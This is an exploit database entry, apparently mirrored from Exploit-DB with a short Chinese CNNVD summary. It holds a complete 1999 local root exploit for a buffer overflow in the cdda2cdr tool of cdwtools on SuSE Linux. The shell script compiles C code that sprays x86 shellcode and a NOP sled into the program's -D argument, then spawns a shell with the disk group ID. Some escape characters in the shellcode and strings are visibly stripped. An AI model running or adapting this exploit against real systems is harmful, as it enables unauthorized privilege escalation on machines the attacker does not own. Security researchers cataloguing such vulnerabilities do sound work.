https://www.exploit-db.com/exploits/19565
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-038

Linuxcdwtools093及早期版本存在缓冲区溢出漏洞。本地用户可以借助此漏洞获得根权限。

#! /bin/sh
#source: http://www.securityfocus.com/bid/738/info
#
#cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. 
#
#--- cdda2x.sh ---
#! /bin/sh
#
# Shell script for Linux x86 cdda2cdr exploit
# Brock Tellier [email protected]
#

cat > /tmp/cdda2x.c <<EOF

/**
 ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)

 ** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz>
 ** 
 ** Brock Tellier [email protected] 
 **/


#include <stdlib.h>
#include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/tmp/cd";



#define LEN 500
#define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


void main(int argc, char *argv[]) {

int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];

 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffern", argv[0]);
 exit(0);
 }
 else if (argc == 2){
   offset=atoi(argv[1]);

 }
 else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);

 }
 else {
   offset=500;
   buflen=500;

 }


addr=get_sp();

fprintf(stderr, "Linux x86 cdda2cdr local disk exploitn");
fprintf(stderr, "Brock Tellier [email protected]");
fprintf(stderr, "Using addr: 0x%xn", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;

execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);


/*
for (i=0; i < strlen(buf); i++) putchar(buf[i]);
*/

}

EOF

cat > /tmp/cd.c <<EOF
void main() { 
    setregid(getegid(), getegid());
    system("/bin/bash");
}
EOF

gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x

来源:BID
名称:738
链接:http://www.securityfocus.com/bid/738
来源:SUSE
名称:19991019Securityholeincdwtools<093
链接:http://www.novell.com/linux/security/advisories/suse_security_announce_25.html